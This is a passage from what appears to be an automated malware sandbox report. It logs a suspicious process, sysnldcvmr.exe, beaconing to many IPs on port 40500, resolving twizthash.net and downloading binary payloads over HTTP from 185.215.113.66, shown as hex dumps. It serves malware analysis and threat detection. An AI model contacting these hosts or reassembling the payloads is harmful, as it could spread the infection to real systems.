                                                                                                                  Nov 30, 2024 01:55:15.431185007 CET5618640500192.168.2.477.44.192.46
                                                                                                                  Nov 30, 2024 01:55:20.439270973 CET5618640500192.168.2.42.190.67.184
                                                                                                                  Nov 30, 2024 01:55:25.455137014 CET5618640500192.168.2.489.218.218.206
                                                                                                                  Nov 30, 2024 01:55:30.455254078 CET5618640500192.168.2.482.137.239.235
                                                                                                                  Nov 30, 2024 01:55:35.471659899 CET5618640500192.168.2.42.185.189.167
                                                                                                                  Nov 30, 2024 01:55:40.531369925 CET5618640500192.168.2.4183.109.168.229
                                                                                                                  Nov 30, 2024 01:55:45.565434933 CET5618640500192.168.2.4189.150.7.25
                                                                                                                  Nov 30, 2024 01:55:50.566231966 CET5618640500192.168.2.4134.35.126.112
                                                                                                                  Nov 30, 2024 01:55:55.604365110 CET5618640500192.168.2.42.176.90.19
                                                                                                                  Nov 30, 2024 01:56:00.680926085 CET5618640500192.168.2.4188.160.12.49
                                                                                                                  Nov 30, 2024 01:56:05.675239086 CET5618640500192.168.2.4134.35.107.95
                                                                                                                  Nov 30, 2024 01:56:10.676512003 CET5618640500192.168.2.4151.245.127.72
                                                                                                                  Nov 30, 2024 01:56:15.689903975 CET5618640500192.168.2.42.135.246.18
                                                                                                                  Nov 30, 2024 01:56:20.718765974 CET5618640500192.168.2.42.177.228.237
                                                                                                                  Nov 30, 2024 01:56:25.733510971 CET5618640500192.168.2.477.81.130.60
                                                                                                                  Nov 30, 2024 01:56:28.684313059 CET6135353192.168.2.41.1.1.1
                                                                                                                  Nov 30, 2024 01:56:28.956264973 CET53613531.1.1.1192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:30.779181004 CET5618640500192.168.2.491.185.130.166
                                                                                                                  Nov 30, 2024 01:56:35.814663887 CET5618640500192.168.2.4182.188.65.58
                                                                                                                  Nov 30, 2024 01:56:40.863135099 CET5618640500192.168.2.494.141.226.56
                                                                                                                  Nov 30, 2024 01:56:45.912158012 CET5618640500192.168.2.4195.158.21.74
                                                                                                                  Nov 30, 2024 01:56:51.540424109 CET5618640500192.168.2.4134.35.205.29
                                                                                                                  Nov 30, 2024 01:56:56.642307997 CET5618640500192.168.2.4198.163.193.96
                                                                                                                  Nov 30, 2024 01:57:01.679029942 CET5618640500192.168.2.4134.35.104.95
                                                                                                                  Nov 30, 2024 01:57:06.858689070 CET5618640500192.168.2.492.46.228.246
                                                                                                                  Nov 30, 2024 01:57:11.881467104 CET5618640500192.168.2.4151.232.164.243
                                                                                                                  Nov 30, 2024 01:57:16.892515898 CET5618640500192.168.2.4217.30.160.219
                                                                                                                  Nov 30, 2024 01:57:22.261796951 CET5618640500192.168.2.4178.71.163.141
                                                                                                                  Nov 30, 2024 01:57:27.264625072 CET5618640500192.168.2.441.138.38.164
                                                                                                                  Nov 30, 2024 01:57:32.282424927 CET5618640500192.168.2.4195.158.18.194
                                                                                                                  Nov 30, 2024 01:57:37.322689056 CET5618640500192.168.2.489.249.62.87
                                                                                                                  Nov 30, 2024 01:57:42.332195044 CET5618640500192.168.2.45.239.147.239
                                                                                                                  Nov 30, 2024 01:57:47.362010956 CET5618640500192.168.2.437.99.52.150
                                                                                                                  Nov 30, 2024 01:57:52.755253077 CET5618640500192.168.2.480.191.218.209
                                                                                                                  Nov 30, 2024 01:57:57.753210068 CET5618640500192.168.2.4176.113.143.77
                                                                                                                  Nov 30, 2024 01:58:02.768115997 CET5618640500192.168.2.42.190.67.184
                                                                                                                  Nov 30, 2024 01:58:07.784043074 CET5618640500192.168.2.45.219.134.102
                                                                                                                  Nov 30, 2024 01:58:12.799197912 CET5618640500192.168.2.4213.230.108.92
                                                                                                                  Nov 30, 2024 01:58:17.846191883 CET5618640500192.168.2.482.200.169.186
                                                                                                                  Nov 30, 2024 01:58:22.848088980 CET5618640500192.168.2.4188.212.145.214
                                                                                                                  Nov 30, 2024 01:58:27.862672091 CET5618640500192.168.2.491.185.146.150
                                                                                                                  Nov 30, 2024 01:58:33.434557915 CET5618640500192.168.2.4187.223.139.73
                                                                                                                  Nov 30, 2024 01:58:38.440011024 CET5618640500192.168.2.489.249.62.87
                                                                                                                  Nov 30, 2024 01:58:43.440088987 CET5618640500192.168.2.42.132.15.134
                                                                                                                  Nov 30, 2024 01:58:48.472178936 CET5618640500192.168.2.489.44.147.157
                                                                                                                  Nov 30, 2024 01:58:53.505660057 CET5618640500192.168.2.494.230.44.71
                                                                                                                  Nov 30, 2024 01:58:58.519094944 CET5618640500192.168.2.45.251.47.42

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Nov 30, 2024 01:56:28.684313059 CET192.168.2.41.1.1.10x5fd8Standard query (0)twizthash.netA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Nov 30, 2024 01:56:28.956264973 CET1.1.1.1192.168.2.40x5fd8No error (0)twizthash.net185.215.113.66A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • 185.215.113.66
                                                                                                                  • 185.215.113.84
                                                                                                                  • 91.202.233.141

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.449730185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:55:02.588855028 CET166OUTGET /1 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:03.970088959 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:55:03 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 8960
                                                                                                                  Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "671230ee-2300"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                  Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                  Nov 30, 2024 01:55:03.970103025 CET124INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                  Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TE
                                                                                                                  Nov 30, 2024 01:55:03.970443964 CET1236INData Raw: 4c 42 63 2a 88 24 37 be 0d 52 6c ca 2d 11 74 6a 4f 1c 96 52 71 18 29 06 58 2e ed 84 4a d6 69 35 40 34 36 fa a4 03 08 6e 3d cc 79 d5 da 9b cd e5 49 62 a0 15 b7 25 90 b3 49 fd 19 9c 00 1d 6e be 47 6c 88 53 1f 7a bc b7 33 91 33 28 07 fa a3 3a 26 01
                                                                                                                  Data Ascii: LBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM#~Ei
                                                                                                                  Nov 30, 2024 01:55:03.970619917 CET1236INData Raw: 93 d9 75 84 fb 01 3a 8d e5 b7 91 3a 76 75 6b d3 6c a6 b9 fe a4 2f 47 5e 75 68 33 a0 76 87 6a 1a b3 ec d4 d7 f1 a1 5a c1 ff 30 43 2c 25 b0 ea 1e 1b 51 9d 20 86 8b df 35 f9 6d 0b 1e 79 38 0d bc 65 b9 0b 84 27 d9 2b 6f f9 7b 17 0e af 44 b6 38 8a 0b
                                                                                                                  Data Ascii: u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9[h1_&},fOnN
                                                                                                                  Nov 30, 2024 01:55:03.970628977 CET248INData Raw: 7b 26 54 bb 8f 3b 49 5d 85 8d ef 23 d3 03 bf d7 a3 12 7a 16 b2 c0 04 d2 f8 59 ed 93 77 a1 9b 16 eb 38 08 4f 1f f3 41 a0 7b 13 e5 00 b1 6b dd 19 4b ed c5 fb 8c e7 26 47 0f 46 fb 4d 58 09 99 98 14 46 4a 2b a4 8e 49 0f b4 a7 97 24 3f bd 72 2d 3a 50
                                                                                                                  Data Ascii: {&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 NTSgA7|I5Y&hOhAcUz(S7S})!s%F'GWfS\D5LR)r9X+%
                                                                                                                  Nov 30, 2024 01:55:03.971019983 CET1236INData Raw: 89 71 be 79 12 82 18 46 ac a6 88 ba 3d 5a 96 af 3f a5 ef 1f e9 da 21 18 33 69 f5 e3 08 b7 9c 52 4d 92 10 87 70 e8 6c 0e e9 14 c4 c1 93 a8 2f 42 72 dd 86 d8 05 a9 18 6c fe 42 37 2d 2a 59 74 3b 7c 72 a6 7f bc 53 8f 84 17 e1 ce b6 df 7b 2e cc fe ad
                                                                                                                  Data Ascii: qyF=Z?!3iRMpl/BrlB7-*Yt;|rS{.gdfow%f.tBH{:Ba{%dPL(Q6V>m:p@Nx!I EKJ*{s`#UWr|Df~Y:<@c?-G
                                                                                                                  Nov 30, 2024 01:55:03.971240044 CET1236INData Raw: b8 f9 77 31 77 35 65 64 c5 bb ba 51 07 10 a4 ce 44 d9 db b7 71 e2 b5 48 ee fa 05 91 3d 1b c9 c6 91 2e ff f0 a9 7e 6f 84 73 ba 58 6f e7 75 df 92 c7 48 7f c8 65 50 e5 64 b8 74 ba 6e 71 60 59 36 47 34 c4 89 40 bc 81 34 47 fe 22 ff eb 45 4c 97 ef 2a
                                                                                                                  Data Ascii: w1w5edQDqH=.~osXouHePdtnq`Y6G4@4G"EL*-D$hOYCMt;Eby;tQfqV{#btFGqNPs%#@#&AG =OPp*uLx!$A<k_xmO1>
                                                                                                                  Nov 30, 2024 01:55:03.971247911 CET248INData Raw: c7 16 06 88 4f a6 d0 e2 07 16 8f d1 6f 4f ed 61 fd 2f f4 a0 9c 03 da 7f 60 b3 09 01 fb 75 30 18 7f f9 60 5d c4 9a c2 7e 36 ce f1 82 6c 67 ab 4d 68 f2 77 f9 52 c2 4f fa a0 61 6b e3 3a e6 0e 25 78 4e 3b a3 59 5d 02 e8 e2 07 c4 08 44 69 97 04 49 86
                                                                                                                  Data Ascii: OoOa/`u0`]~6lgMhwROak:%xN;Y]DiIYj`i@gnK= {}7NWSC"$Z^"Ld($]8,C"e0+Y_%}a\w_ra=N.>e@b#T\@A$FM.1
                                                                                                                  Nov 30, 2024 01:55:03.971739054 CET1236INData Raw: 79 e0 10 dc 1e 09 05 37 4a 4b 50 68 04 09 8c bf 03 d1 17 2c 32 57 3e c1 e9 3e 7b b2 a3 5d 10 95 a7 74 b6 bd fe c6 c9 12 03 83 34 fd 15 69 cf c8 fe 55 b2 ed 61 ec 41 49 bc 64 a0 42 b3 ac 4a 85 83 00 2b 3a 92 4f 22 46 0c 37 26 dd da 56 a0 6e 23 a9
                                                                                                                  Data Ascii: y7JKPh,2W>>{]t4iUaAIdBJ+:O"F7&Vn#Rj*$.z"Wt,qNh"1=3Ib:Y!\fsAF),l;mN|#{S?&P<G5IjYWY>q+fL~W5GXPY?ECjZ@
                                                                                                                  Nov 30, 2024 01:55:03.971863031 CET1188INData Raw: 70 91 81 19 2c 59 8e f1 0a af 73 c4 90 b3 45 dd f9 e2 6e 1b 38 f2 81 c3 da ee d3 fd 57 21 09 ae 12 41 32 4f 75 e6 60 0d 48 d7 82 a7 f1 a9 30 77 2e f3 7a c7 2b ff f9 56 6a 32 57 ca bd 80 37 72 35 81 48 51 9e 7f a7 92 f4 bf ff de 88 c8 93 ee e2 5d
                                                                                                                  Data Ascii: p,YsEn8W!A2Ou`H0w.z+Vj2W7r5HQ]Q(3j?vK={,m@^1?vHl6=Nke&u+bIB`#0s']B4/8>XuP_Q@(^OS$&


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.449732185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:55:05.118108988 CET166OUTGET /1 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:06.449826002 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:55:06 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 8960
                                                                                                                  Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "671230ee-2300"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                  Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                  Nov 30, 2024 01:55:06.449947119 CET1236INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                  Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^
                                                                                                                  Nov 30, 2024 01:55:06.449958086 CET1236INData Raw: 25 31 0a 68 9c d8 ba 48 4c 90 81 b7 28 74 68 c8 16 f9 b8 2a c6 90 b0 6c 31 39 f2 bf 87 64 53 3a 32 36 df 01 fc e5 9e 18 72 19 69 e2 c7 ef 65 32 01 84 09 84 3b 94 85 f3 13 25 da 52 6f 20 19 c5 d9 dd d1 da 08 6e 35 b4 1e 41 c3 9d d9 91 9f 3f 3a 82
                                                                                                                  Data Ascii: %1hHL(th*l19dS:26rie2;%Ro n5A?:p"~ B'P?:/B1%yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)W
                                                                                                                  Nov 30, 2024 01:55:06.450551033 CET1236INData Raw: f3 0c 7b d7 90 9d 53 08 50 35 7a 7f 49 0b 16 9f ae a3 19 6a 1b 05 aa 5c 54 c6 1f 37 73 99 af 43 61 76 51 11 f2 eb 89 90 be 6d c9 bd 48 20 04 57 6d a3 8a 18 2a 96 64 13 63 ca 0d 0f 2d 28 7f 61 ff eb 80 38 1c 6f fd f6 59 64 de 2b f7 3d 76 66 94 76
                                                                                                                  Data Ascii: {SP5zIj\T7sCavQmH Wm*dc-(a8oYd+=vfvB"1C,/m#u?n8CpT}v#0]{&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 N
                                                                                                                  Nov 30, 2024 01:55:06.450562000 CET1236INData Raw: f3 c6 cf f8 95 24 43 84 1e 1f 9b 9c d9 67 06 dc 57 43 c0 ff d4 c9 b4 19 52 67 b0 40 5c 8f 00 ab 9d ff 39 47 b4 07 78 4f 3d ea 81 53 76 ad 4d 76 16 a5 b7 2e e5 b9 6d 89 3c f6 9f 00 cc a4 9a b7 cc 8f b1 36 f8 1a e3 38 6a df fd 09 9e 74 6f 47 14 bc
                                                                                                                  Data Ascii: $CgWCRg@\9GxO=SvMv.m<68jtoG M,"p-R6(=6;BS)2Mq#+dM1;oyAzm@!<Enk ?C=|9PednGDF%F-_!Y^uODIuH"oR^k=%
                                                                                                                  Nov 30, 2024 01:55:06.450571060 CET1236INData Raw: 94 04 da 8e d4 c0 98 3e 24 6d 01 7b 78 3d 57 2b 8b 06 77 55 2d 93 2b 04 bb 96 97 82 3d 6b 0f a9 c8 ef 2f e2 ce 5d 74 af 33 db 0c 35 3d f4 cd c7 65 c3 05 79 78 24 ce f4 a6 99 58 93 43 df f2 17 d2 12 2f 0c c1 a0 51 33 10 28 3d c5 a6 ec 61 a7 46 c8
                                                                                                                  Data Ascii: >$m{x=W+wU-+=k/]t35=eyx$XC/Q3(=aFS3RJr^{@[W\)9f>F}+V1*p0RQO{jwdL0_2}hGn[>q>a r{tVJ0sN]Q\-#6npc`
                                                                                                                  Nov 30, 2024 01:55:06.451380014 CET776INData Raw: d3 90 d1 fd d7 07 74 76 fe e7 1d df 46 a6 78 b3 3b 32 6d d7 75 d6 e6 a1 f8 ad 93 84 f2 7f 70 fa 89 4b 36 27 09 96 bc b1 c7 59 94 41 08 18 1d 5f 62 ee ed a0 2c 51 1b 21 fd cb 69 5e 5b 4f 79 a3 18 ee 3b 5f a3 09 af 9e 3b d6 57 f1 8e a7 51 41 72 bb
                                                                                                                  Data Ascii: tvFx;2mupK6'YA_b,Q!i^[Oy;_;WQAr_2H}/%~.6*rjk>DQgo_7}-)i&O%[u{zhaRIN9<[C&WK,+-27}#hH?FDr2Ey#s
                                                                                                                  Nov 30, 2024 01:55:06.641936064 CET1032INData Raw: d6 42 dd 60 15 da d4 ac 1b cb a2 db 9a 23 a2 a9 bc 30 73 1b 27 ac 5d a1 f6 8b 14 c2 0e 0f f5 42 18 a3 f1 17 e9 34 cc 2f c2 81 9d a2 10 8b 06 38 16 3e d6 09 12 90 e2 58 81 d1 01 75 e4 d0 50 cc b3 83 5f 04 51 d7 40 91 ec 28 a1 5e 13 d9 94 e5 d5 cc
                                                                                                                  Data Ascii: B`#0s']B4/8>XuP_Q@(^OS$&?Jl[e:s8Mf?QCxCzUw%tMoueUiQerj1F\FC1qIfbh\I.Xj[R)^F2Nzi
                                                                                                                  Nov 30, 2024 01:55:11.720053911 CET166OUTGET /2 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:12.157737017 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:55:11 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 10496
                                                                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67154d18-2900"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                  Nov 30, 2024 01:55:12.157861948 CET1236INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>*B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QK
                                                                                                                  Nov 30, 2024 01:55:12.161751986 CET1236INData Raw: 63 34 74 b5 c2 9f e6 cf 24 40 6d 6d 39 94 34 21 a1 59 32 49 93 8d 45 6f 16 41 e3 3e fb e9 ec 01 f9 89 40 75 7d 84 c1 29 99 2e 8f f9 01 1b d7 e2 f5 ea f5 37 7e 95 c0 87 7f d4 e2 e3 b8 2c a3 95 7b 43 15 a1 69 fe 92 c8 13 e2 7f 5f 3b 68 4b fa 25 e1
                                                                                                                  Data Ascii: c4t$@mm94!Y2IEoA>@u}).7~,{Ci_;hK%D&kuY'p=/a:NTtKu"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\
                                                                                                                  Nov 30, 2024 01:55:12.161904097 CET1236INData Raw: 0b a6 7d 79 c6 0e 19 41 de 44 a9 03 74 f2 fb a9 92 bc 27 b6 69 9d 42 1a 59 26 6e 6d a8 df 05 cd 7b e6 9c e9 45 0f 67 74 bc 1a e1 59 dd 58 26 67 a8 cb ea 52 87 27 f1 9b fe 95 bd 52 bf 68 3a 2f 74 d5 bc 82 48 3c f6 ef 52 41 bf 9a 2d b2 e4 48 3f 02
                                                                                                                  Data Ascii: }yADt'iBY&nm{EgtYX&gR'Rh:/tH<RA-H?:3a$8;SU*rN1QIuc>"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;B


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.449735185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:55:13.293576002 CET166OUTGET /2 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:14.681448936 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:55:14 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 10496
                                                                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67154d18-2900"
                                                                                                                  Accept-Ranges: bytes
